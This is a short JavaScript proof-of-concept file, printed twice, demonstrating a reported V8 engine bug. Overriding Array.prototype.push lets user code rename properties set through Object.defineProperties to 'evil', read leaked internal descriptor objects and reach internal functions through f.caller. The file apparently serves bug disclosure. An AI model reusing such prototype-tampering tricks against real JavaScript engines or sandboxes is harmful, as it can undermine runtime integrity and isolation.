cms/v8-array#push-used-internally.js

## v8-array#push-used-internally.js
/* V8 Engine internals using built-ins
 *
 * Bug report:
 *   http://code.google.com/p/v8/issues/detail?id=1625
 * Bug on code:
 *   http://code.google.com/p/v8/source/browse/trunk/src/v8natives.js?r=8733#1026
 *   http://www.google.com/codesearch#W9JxUuHYyMg/trunk/src/v8natives.js&l=1026,1029
 */

var _push = Array.prototype.push;
Array.prototype.push = function f(arg) {
  if (typeof arg == 'string') {
    // Property name
    arg = 'evil';
  } else {
    // Leaked PropertyDescriptor spec. internal type exposed
    arg.value_ = true;
    console.log(arg);
  }

  console.log(f.caller); // Leaked "defineProperties" internal implementation
  _push.apply(this, arguments);
};

var o = Object.defineProperties({}, { 'foo': { value: 'bar' } });
console.log(o.evil); // true
	/* V8 Engine internals using built-ins
	*
	* Bug report:
	* http://code.google.com/p/v8/issues/detail?id=1625
	* Bug on code:
	* http://code.google.com/p/v8/source/browse/trunk/src/v8natives.js?r=8733#1026
	* http://www.google.com/codesearch#W9JxUuHYyMg/trunk/src/v8natives.js&l=1026,1029
	*/

	var _push = Array.prototype.push;
	Array.prototype.push = function f(arg) {
	if (typeof arg == 'string') {
	// Property name
	arg = 'evil';
	} else {
	// Leaked PropertyDescriptor spec. internal type exposed
	arg.value_ = true;
	console.log(arg);
	}

	console.log(f.caller); // Leaked "defineProperties" internal implementation
	_push.apply(this, arguments);
	};

	var o = Object.defineProperties({}, { 'foo': { value: 'bar' } });
	console.log(o.evil); // true